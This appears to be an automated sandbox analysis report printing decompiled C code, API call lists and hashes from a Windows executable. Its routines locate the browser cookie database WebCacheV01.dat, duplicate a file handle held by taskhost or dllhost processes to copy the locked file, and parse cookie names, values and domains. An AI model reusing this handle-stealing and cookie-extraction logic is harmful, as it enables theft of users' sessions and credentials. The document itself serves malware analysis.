                                                                                                                                                			E0040D071(struct HINSTANCE__** __esi) {
                                                                                                                                                				void* _t7;
                                                                                                                                                				struct HINSTANCE__* _t8;
                                                                                                                                                				_Unknown_base(*)()* _t14;
                                                                                                                                                
                                                                                                                                                				if( *__esi == 0) {
                                                                                                                                                					_t8 = LoadLibraryW(L"psapi.dll"); // executed
                                                                                                                                                					 *__esi = _t8;
                                                                                                                                                					__esi[1] = GetProcAddress(_t8, "GetModuleBaseNameW");
                                                                                                                                                					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                                                                                					__esi[3] = GetProcAddress( *__esi, "EnumProcessModulesEx");
                                                                                                                                                					__esi[5] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                                                                                					__esi[6] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                                                                                					_t14 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                                                                                					__esi[4] = _t14;
                                                                                                                                                					return _t14;
                                                                                                                                                				}
                                                                                                                                                				return _t7;
                                                                                                                                                			}


                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNELBASE(psapi.dll,0040C7D4,0040D051,74B059F0,0040CF75,?,?), ref: 0040D07C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040D090
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModules), ref: 0040D09C
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,EnumProcessModulesEx), ref: 0040D0A8
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,GetModuleFileNameExW), ref: 0040D0B4
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,EnumProcesses), ref: 0040D0C0
                                                                                                                                                • GetProcAddress.KERNEL32(0040C7D4,GetModuleInformation), ref: 0040D0CC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                                                • String ID: EnumProcessModules$EnumProcessModulesEx$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                • API String ID: 2238633743-4233621989
                                                                                                                                                • Opcode ID: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                • Instruction ID: 664551807a59a5b6bdf4ad21fd1c91f4c0cb88ece692cebe109dcbeab8ff2071
                                                                                                                                                • Opcode Fuzzy Hash: 0789f8285eff88e4c124665e95ccda41b1b8d99a0419bcd589fce340f2d6ed66
                                                                                                                                                • Instruction Fuzzy Hash: BDF0E274980704AACB706F759D49E46BAF0EFA8700721492EE1E5A3690D6B9A0C4CF88
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                			E00403BAF(void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                				int _v8;
                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                				int _v16;
                                                                                                                                                				int _v20;
                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                				int _v60;
                                                                                                                                                				int _v64;
                                                                                                                                                				int _v68;
                                                                                                                                                				char _v72;
                                                                                                                                                				intOrPtr _v76;
                                                                                                                                                				int _v80;
                                                                                                                                                				int _v84;
                                                                                                                                                				int _v88;
                                                                                                                                                				int _v92;
                                                                                                                                                				intOrPtr _v96;
                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                				intOrPtr _v104;
                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                				signed int _v112;
	signed int _v116;
	void _v124;
	void _v132;
	void _v136;
	char _v140;
	char _v912;
	char _v936;
	char _v1496;
	char _v1500;
	void* __edi;
	void* __esi;
	void* _t89;
	signed int _t109;
	signed int _t114;
	intOrPtr _t119;
	intOrPtr _t120;
	intOrPtr _t121;
	intOrPtr _t122;
	intOrPtr _t123;
	intOrPtr _t124;
	intOrPtr _t125;
	intOrPtr* _t137;
	intOrPtr* _t139;
	void* _t142;
	intOrPtr _t147;
	intOrPtr _t148;
	void* _t151;
	void* _t163;

	_t151 = __edx;
	_v76 = 0x100;
	_v56 = 0x100;
	_v80 = 0;
	_v92 = 0;
	_v88 = 0;
	_v84 = 0;
	_v60 = 0;
	_v72 = 0;
	_v68 = 0;
	_v64 = 0;
	E00403E49( &_v1500);
	_t89 = E004048DA(_t142, _t151,  &_v1500, _a8, _a4 + 4); // executed
	_t164 = _t89;
	if(_t89 == 0) {
		L30:
		E00403E8F( &_v912);
		E00403F55( &_v936);
		E00406710( &_v1496);
		E00406355( &_v72);
		return E00406355( &_v92);
	} else {
		_v12 = 0x20;
		_v20 = 0;
		_v8 = 0;
		_v16 = 0;
		do {
			if(E00404BE4(_t164,  &_v1500,  &_v20) != 0) {
				_t161 =  &_v20;
				_v24 = E004039C1( &_v20, L"Name");
				_v28 = E004039C1( &_v20, L"Value");
				_v32 = E004039C1( &_v20, L"Path");
				_v36 = E004039C1( &_v20, L"RDomain");
				_v48 = E004039C1(_t161, L"Expires");
				_v52 = E004039C1(_t161, L"LastModified");
				_v44 = E004039C1(_t161, L"EntryId");
				_v40 = E004039C1(_t161, L"Flags");
				if(_v24 != 0 && _v28 != 0 && _v32 != 0 && _v36 != 0) {
					_t109 = memset( &_v136, 0, 0x2c);
					_t163 = _t163 + 0xc;
					E0040637A(_t109 | 0xffffffff,  &_v92, 0x40f454);
					E0040518A( &_v92, _v36);
					_t114 = _v92;
					_v112 = 0x40f454;
					if(_t114 != 0) {
						_v112 = _t114;
					}
					E0040637A(_t114 | 0xffffffff,  &_v72, 0x40f454);
					E0040518A( &_v72, _v32);
					_t119 = _v72;
					_v116 = 0x40f454;
					if(_t119 != 0) {
						_v116 = _t119;
					}
					_t120 = _v24;
					_t147 =  *((intOrPtr*)(_t120 + 0x328));
					if(_t147 <= 0) {
						_v108 = 0x40f924;
					} else {
						_t139 = _t120 + 0x220;
						 *((char*)(_t147 +  *_t139 - 1)) = 0;
						_v108 =  *_t139;
					}
					_t121 = _v28;
					_t148 =  *((intOrPtr*)(_t121 + 0x328));
					if(_t148 <= 0) {
						_v104 = 0x40f924;
					} else {
						_t137 = _t121 + 0x220;
						 *((char*)( *_t137 + _t148 - 1)) = 0;
						_v104 =  *_t137;
					}
					_t122 = _v48;
					if(_t122 != 0) {
						memcpy( &_v132, _t122 + 0x220, 8);
						_t163 = _t163 + 0xc;
					}
					_t123 = _v52;
					if(_t123 != 0) {
						memcpy( &_v124, _t123 + 0x220, 8);
						_t163 = _t163 + 0xc;
					}
					_t124 = _v40;
					if(_t124 != 0) {
						_v96 =  *((intOrPtr*)(_t124 + 0x220));
					}
					_t125 = _v44;
					if(_t125 == 0) {
						_v140 = 0;
						_v136 = 0;
					} else {
						_v140 =  *((intOrPtr*)(_t125 + 0x220));
						_v136 =  *((intOrPtr*)(_t125 + 0x224));
					}
					_v100 = _a8;
					 *((intOrPtr*)( *_a4))( &_v140); // executed
				}
			}
		} while (E0040489D( &_v1500) != 0);
		if(_v20 != 0) {
			free(_v20);
		}
		goto L30;
	}
}
                                                                                                                                                0x00403db4
                                                                                                                                                0x00403dd0
                                                                                                                                                0x00403dd6
                                                                                                                                                0x00403db6
                                                                                                                                                0x00403dc2
                                                                                                                                                0x00403dc8
                                                                                                                                                0x00403dc8
                                                                                                                                                0x00403de8
                                                                                                                                                0x00403dee
                                                                                                                                                0x00403dee
                                                                                                                                                0x00403c9f
                                                                                                                                                0x00403dfb
                                                                                                                                                0x00403e06
                                                                                                                                                0x00403e0b
                                                                                                                                                0x00403e10
                                                                                                                                                0x00000000
                                                                                                                                                0x00403e06

APIs
  • Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F
  • Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0
• free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B
  • Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA
• memset.MSVCRT ref: 00403CCA
  • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
  • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
• memcpy.MSVCRT ref: 00403D7C
• memcpy.MSVCRT ref: 00403D97
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcslen
• String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
• API String ID: 4182952938-1692241855
• Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
• Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
• Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
• Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 90%
E004039F6(void* __eax) {
	int _v8;
	intOrPtr _v12;
	signed int _v16;
	signed int _v20;
	char _v52;
	void _v578;
	int _v580;
	void _v1106;
	long _v1108;
	void* __ebx;
	void* __edi;
	void* __esi;
	intOrPtr _t44;
	signed short _t48;
	int _t55;
	void* _t60;
	signed int _t63;
	void* _t77;
	void* _t94;
	signed short* _t100;
	void* _t102;

	_t102 = __eax;
	_t44 =  *((intOrPtr*)(__eax + 0x63c));
	_t100 = __eax + 0x430;
	_v8 = 0;
	 *_t100 = 0;
	if(_t44 != 1) {
		__eflags = _t44 - 2;
		if(__eflags == 0) {
			_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
			__eflags = _t48;
			if(_t48 == 0) {
				_v8 =  *((intOrPtr*)(_t102 + 0x418));
			}
		}
		L15:
		return _v8;
	}
	_v580 = 0;
	memset( &_v578, 0, 0x208);
	_v1108 = _v1108 & 0x00000000;
	memset( &_v1106, 0, 0x208);
	E0040DACC( &_v1108, 0); // executed
	_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
	_t12 = wcslen( &_v1108) + 1; // 0x1
	if(_t55 + _t12 >= 0x104) {
		_t15 =  &_v580;
		 *_t15 = _v580 & 0x00000000;
		__eflags =  *_t15;
	} else {
		E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
	}
	_t60 = E004057D1( &_v580);
	_t109 = _t60;
	_pop(_t94);
	if(_t60 == 0) {
		_v8 = 0xfffffffd;
	} else {
		_t90 = _t102 + 4;
		_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
		_t110 = _t63;
		if(_t63 == 0) {
			_v20 = _v20 & _t63;
			_v16 = _v16 & _t63;
			_v12 = 0x1388;
			E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
			E00406264( &_v52, _t94, L"taskhost.exe");
			E00406264( &_v52, _t94, L"taskhostex.exe");
			E00406264( &_v52, _t94, L"taskhostw.exe");
			E0040567E(_t100, L"ecv"); // executed
			_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
			_t111 = _t77;
			_push(_t100);
			if(_t77 == 0) {
				_v8 = 0xfffffffe;
				DeleteFileW(??);
				 *_t100 =  *_t100 & 0x00000000;
				__eflags =  *_t100;
			} else {
				if(E00403FDE(_t90, _t111) == 0) {
					_v8 =  *((intOrPtr*)(_t102 + 0x418));
				}
			}
			E0040623E( &_v52);
			E00406710( &_v20);
		}
	}
}

Instruction addresses: 0x00403a01 0x00403a03 0x00403a0f 0x00403a15 0x00403a18 0x00403a1b 0x00403b86 0x00403b89 0x00403b95 0x00403b9a 0x00403b9c 0x00403ba4 0x00403ba4 0x00403b9c 0x00403ba7 0x00403bae 0x00403bae 0x00403a2f 0x00403a36 0x00403a3b 0x00403a50 0x00403a5e 0x00403a68 0x00403a7c 0x00403a86 0x00403aa3 0x00403aa3 0x00403aa3 0x00403a88 0x00403a9a 0x00403aa0 0x00403ab2 0x00403ab7 0x00403ab9 0x00403aba 0x00403b7d 0x00403ac0 0x00403ac6 0x00403acc 0x00403ad1 0x00403ad3 0x00403ad9 0x00403adc 0x00403ae2 0x00403af3 0x00403b00 0x00403b0d 0x00403b1a 0x00403b24 0x00403b3a 0x00403b3f 0x00403b41 0x00403b42 0x00403b5a 0x00403b61
                                                                                                                                                0x00403b67
                                                                                                                                                0x00403b67
                                                                                                                                                0x00403b44
                                                                                                                                                0x00403b4d
                                                                                                                                                0x00403b55
                                                                                                                                                0x00403b55
                                                                                                                                                0x00403b4d
                                                                                                                                                0x00403b6e
                                                                                                                                                0x00403b76
                                                                                                                                                0x00403b76
                                                                                                                                                0x00403ad3

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403A36
                                                                                                                                                • memset.MSVCRT ref: 00403A50
                                                                                                                                                  • Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                • wcslen.MSVCRT ref: 00403A68
                                                                                                                                                • wcslen.MSVCRT ref: 00403A77
                                                                                                                                                  • Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
                                                                                                                                                  • Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
                                                                                                                                                • API String ID: 2175868439-3212516833
                                                                                                                                                • Opcode ID: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
                                                                                                                                                • Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
                                                                                                                                                • Opcode Fuzzy Hash: 3c4648e6942eed560d361546e61e2842c3ac7f93384aa4be2f8c22040effd09d
                                                                                                                                                • Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                				struct HINSTANCE__* _t35;
                                                                                                                                                				intOrPtr* _t37;
                                                                                                                                                				intOrPtr* _t38;
                                                                                                                                                				void* _t41;
                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                				signed int _t49;
                                                                                                                                                				signed int _t51;
                                                                                                                                                				int _t53;
                                                                                                                                                				int _t54;
                                                                                                                                                				signed int _t56;
                                                                                                                                                				signed int _t57;
                                                                                                                                                				signed int _t58;
                                                                                                                                                				int _t61;
                                                                                                                                                				intOrPtr _t63;
                                                                                                                                                				intOrPtr _t64;
                                                                                                                                                				intOrPtr* _t66;
                                                                                                                                                				void* _t67;
                                                                                                                                                				signed int _t71;
                                                                                                                                                				int _t72;
                                                                                                                                                				void* _t73;
                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                
                                                                                                                                                				_t67 = __edx;
                                                                                                                                                				_push(0x70);
                                                                                                                                                				_push(0x40f3f0);
                                                                                                                                                				E0040E2B8(__ebx, __edi, __esi);
                                                                                                                                                				_t35 = GetModuleHandleA(0);
                                                                                                                                                				if(_t35->i != 0x5a4d) {
                                                                                                                                                					L4:
                                                                                                                                                					 *(_t73 - 0x1c) = 0;
                                                                                                                                                				} else {
                                                                                                                                                					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
                                                                                                                                                					if( *_t66 != 0x4550) {
                                                                                                                                                						goto L4;
                                                                                                                                                					} else {
                                                                                                                                                						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
                                                                                                                                                						if(_t57 == 0x10b) {
                                                                                                                                                							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
                                                                                                                                                							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
                                                                                                                                                								goto L4;
                                                                                                                                                							} else {
                                                                                                                                                								_t58 = 0;
                                                                                                                                                								__eflags =  *(_t66 + 0xe8);
                                                                                                                                                								goto L9;
                                                                                                                                                							}
                                                                                                                                                						} else {
                                                                                                                                                							if(_t57 == 0x20b) {
                                                                                                                                                								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
                                                                                                                                                								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
                                                                                                                                                									goto L4;
                                                                                                                                                								} else {
                                                                                                                                                									_t58 = 0;
                                                                                                                                                									__eflags =  *(_t66 + 0xf8);
                                                                                                                                                									L9:
                                                                                                                                                									_t9 = __eflags != 0;
                                                                                                                                                									__eflags = _t9;
                                                                                                                                                									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
                                                                                                                                                								}
                                                                                                                                                							} else {
                                                                                                                                                								goto L4;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				 *(_t73 - 4) = 0;
                                                                                                                                                				_t61 = 2;
                                                                                                                                                				__set_app_type(_t61);
                                                                                                                                                				 *0x413700 =  *0x413700 | 0xffffffff;
                                                                                                                                                				 *0x413704 =  *0x413704 | 0xffffffff;
                                                                                                                                                				_t37 = __p__fmode();
                                                                                                                                                				_t63 =  *0x41238c; // 0x0
                                                                                                                                                				 *_t37 = _t63;
                                                                                                                                                				_t38 = __p__commode();
                                                                                                                                                				_t64 =  *0x412388; // 0x0
                                                                                                                                                				 *_t38 = _t64;
                                                                                                                                                				 *0x4136fc =  *_adjust_fdiv;
                                                                                                                                                				_t41 = E0040E2B2();
                                                                                                                                                				_t81 =  *0x412000; // 0x1
                                                                                                                                                				if(_t81 == 0) {
                                                                                                                                                					__setusermatherr(E0040E2B2);
                                                                                                                                                					_pop(_t64);
                                                                                                                                                				}
                                                                                                                                                				E0040E2A0(_t41);
                                                                                                                                                				L0040E29A();
                                                                                                                                                				_t43 =  *0x412384; // 0x0
                                                                                                                                                				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
                                                                                                                                                				_t47 = _t73 - 0x2c;
                                                                                                                                                				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
                                                                                                                                                				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
                                                                                                                                                				_push(0x40f3bc);
                                                                                                                                                				_push(0x40f394); // executed
                                                                                                                                                				L0040E29A(); // executed
                                                                                                                                                				_t71 =  *__imp___wcmdln;
                                                                                                                                                				if(_t71 != 0) {
                                                                                                                                                					 *(_t73 - 0x34) = _t71;
                                                                                                                                                					__eflags =  *_t71 - 0x22;
                                                                                                                                                					if( *_t71 != 0x22) {
                                                                                                                                                						while(1) {
                                                                                                                                                							__eflags =  *_t71 - 0x20;
                                                                                                                                                							if( *_t71 <= 0x20) {
                                                                                                                                                								goto L19;
                                                                                                                                                							}
                                                                                                                                                							_t71 = _t71 + _t61;
                                                                                                                                                							 *(_t73 - 0x34) = _t71;
                                                                                                                                                						}
                                                                                                                                                					} else {
                                                                                                                                                						while(1) {
                                                                                                                                                							_t71 = _t71 + _t61;
                                                                                                                                                							 *(_t73 - 0x34) = _t71;
                                                                                                                                                							_t56 =  *_t71;
                                                                                                                                                							__eflags = _t56;
                                                                                                                                                							if(_t56 == 0) {
                                                                                                                                                								break;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t56 - 0x22;
                                                                                                                                                							if(_t56 != 0x22) {
                                                                                                                                                								continue;
                                                                                                                                                							}
                                                                                                                                                							break;
                                                                                                                                                						}
                                                                                                                                                						__eflags =  *_t71 - 0x22;
                                                                                                                                                						if( *_t71 == 0x22) {
                                                                                                                                                							L18:
                                                                                                                                                							_t71 = _t71 + _t61;
                                                                                                                                                							__eflags = _t71;
                                                                                                                                                							 *(_t73 - 0x34) = _t71;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					L19:
                                                                                                                                                					_t49 =  *_t71;
                                                                                                                                                					__eflags = _t49;
                                                                                                                                                					if(_t49 != 0) {
                                                                                                                                                						__eflags = _t49 - 0x20;
                                                                                                                                                						if(_t49 <= 0x20) {
                                                                                                                                                							goto L18;
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					 *(_t73 - 0x4c) = 0;
                                                                                                                                                					GetStartupInfoW(_t73 - 0x78);
                                                                                                                                                					__eflags =  *(_t73 - 0x4c) & 0x00000001;
                                                                                                                                                					if(__eflags == 0) {
                                                                                                                                                						_t51 = 0xa;
                                                                                                                                                					} else {
                                                                                                                                                						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
                                                                                                                                                					}
                                                                                                                                                					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
                                                                                                                                                					_t72 = _t53;
                                                                                                                                                					 *(_t73 - 0x7c) = _t72;
                                                                                                                                                					__eflags =  *(_t73 - 0x1c);
                                                                                                                                                					if( *(_t73 - 0x1c) == 0) {
                                                                                                                                                						exit(_t72); // executed
                                                                                                                                                					}
                                                                                                                                                					__imp___cexit();
                                                                                                                                                					_t32 = _t73 - 4;
                                                                                                                                                					 *_t32 =  *(_t73 - 4) | 0xffffffff;
                                                                                                                                                					__eflags =  *_t32;
                                                                                                                                                					_t54 = _t72;
                                                                                                                                                				} else {
                                                                                                                                                					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
                                                                                                                                                					_t54 = 0xff;
                                                                                                                                                				}
                                                                                                                                                				return E0040E2F1(_t54);
                                                                                                                                                			}

APIs
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
• String ID:
• API String ID: 2827331108-0
• Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
• Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
• Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
• Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
                                                                                                                                                				struct _OVERLAPPED* _v8;
                                                                                                                                                				struct _OVERLAPPED* _v12;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				struct _OVERLAPPED* _v20;
                                                                                                                                                				char _v24;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t38;
                                                                                                                                                				void* _t41;
                                                                                                                                                				void* _t49;
                                                                                                                                                				void* _t52;
                                                                                                                                                				int _t55;
                                                                                                                                                				int _t57;
                                                                                                                                                				void* _t67;
                                                                                                                                                
                                                                                                                                                				_t57 = 0;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
                                                                                                                                                				if(_t38 != 0) {
                                                                                                                                                					_v24 = 0;
                                                                                                                                                					_v20 = 0;
                                                                                                                                                					_v16 = 0x1388;
                                                                                                                                                					E00406729(0x8000,  &_v24);
                                                                                                                                                					_t41 = OpenProcess(0x40, 0, _v8);
                                                                                                                                                					_v8 = _t41;
                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                						_a12 = 0;
                                                                                                                                                						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                							_a8 = GetFileSize(_a12, 0);
                                                                                                                                                							_a4 = E00405351(_a16);
                                                                                                                                                							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
                                                                                                                                                							_v12 = _t49;
                                                                                                                                                							if(_t49 != 0) {
                                                                                                                                                								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
                                                                                                                                                								_t67 = _t52;
                                                                                                                                                								if(_t67 != 0) {
                                                                                                                                                									_a16 = 0;
                                                                                                                                                									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
                                                                                                                                                									_t57 = _t55;
                                                                                                                                                									UnmapViewOfFile(_t67);
                                                                                                                                                								}
                                                                                                                                                								FindCloseChangeNotification(_v12); // executed
                                                                                                                                                							}
                                                                                                                                                							CloseHandle(_a4);
                                                                                                                                                							CloseHandle(_a12);
                                                                                                                                                						}
                                                                                                                                                						CloseHandle(_v8);
                                                                                                                                                					}
                                                                                                                                                					E00406710( &_v24);
                                                                                                                                                				}
                                                                                                                                                				return _t57;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
                                                                                                                                                  • Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                  • Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                  • Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                  • Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                  • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                  • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
                                                                                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
                                                                                                                                                • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
                                                                                                                                                • GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679
                                                                                                                                                  • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
                                                                                                                                                • WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
